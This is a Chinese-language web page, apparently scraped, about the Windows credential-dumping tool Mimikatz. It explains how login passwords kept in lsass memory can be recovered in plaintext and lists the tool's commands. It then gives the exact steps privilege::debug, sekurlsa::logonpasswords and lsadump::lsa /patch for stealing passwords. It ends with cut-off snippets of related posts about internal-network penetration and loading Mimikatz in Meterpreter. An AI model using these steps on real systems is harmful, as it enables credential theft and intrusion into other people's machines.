mimikatz是一款功能強大的輕量級除錯神器,通過它你可以提公升程序許可權注入程序讀取程序記憶體,他可以直接從 lsass中獲取當前處於active系統的登入密碼, lsass是微軟windows系統的安全機制它主要用於本地安全和登陸策略,通常我們在登陸系統時輸入密碼之後,密碼便會儲存在 lsass記憶體中,經過其 wdigest 和 tspkg 兩個模組呼叫後,對其使用可逆的演算法進行加密並儲存在記憶體之中, 而mimikatz正是通過對lsass的逆算獲取到明文密碼!也就是說只要你不重啟電腦,就可以通過他獲取到登陸密碼,只限當前登陸系統!
注意:mimikatz的使用需要administrator許可權,否則會提權失敗。
• cls
清屏• exit
退出• version
檢視mimikatz的版本
• system::user
檢視當前登入的系統使用者
• system::computer
檢視計算機名稱
• process::list
列出程序
• process::suspend 程序名稱
暫停程序
• process::stop 程序名稱
結束程序
• process::modules
列出系統的核心模組及所在位置
• service::list
列出系統的服務
• service::remove
移除系統的服務
• service::start stop 服務名稱
啟動或停止服務
• privilege::list
列出許可權列表
• privilege::enable
啟用乙個或多個許可權
• privilege::debug
提公升許可權
• nogpo::cmd
開啟系統的cmd.exe
• nogpo::regedit
開啟系統的登錄檔
• nogpo::taskmgr
開啟任務管理器
• ts::sessions
顯示當前的會話
• ts::processes
顯示程序和對應的pid情況等
• sekurlsa::wdigest
獲取本地使用者資訊及密碼
• sekurlsa::tspkg
獲取tspkg使用者資訊及密碼
• sekurlsa::logonpasswords
獲登陸使用者資訊及密碼
操作很簡單,兩步搞定
首先需要提權:privilege::debug
然後抓取明文密碼:sekurlsa::logonpasswords
第一步依然是提公升許可權:privilege::debug
第二步抓取密碼:lsadump::lsa /patch
mimikatz2 0抓取WINDOWS密碼
看吾愛的,剛好問同事說這個也用過,以後內網滲透的話比較方便 2.0版本的只需要兩條命令就可以了,比以前版本的更簡單了。第一條 privilege debug 提公升許可權 第二條 sekurlsa logonpasswords 抓取密碼 miimkatz還可以抓遠端主機的 輸入 xx 可以檢視工具支...
mimakatz用法 使用Mimikatz讀取密碼
法一 第一條 privilege debug 提公升許可權 第二條 sekurlsa logonpasswords 抓取密碼 注 請以管理員許可權!什麼?要管理員許可權!有管理員許可權了還要你幹嘛.法二 meterreter下已整合了mimikata meterpreter load mimikat...
Mimikatz的使用心得
mimikatz是一款由法國人編寫的輕量級除錯工具,但更為人所知的是使用mimikatz來獲取windows的明文密碼。這個軟體的作者部落格 密碼 8sjl 作者部落格截圖 獲取windows明文密碼的方法 然後右鍵以管理員的方式執行mimikatz 開啟後介面是這樣的 然後輸入privilege ...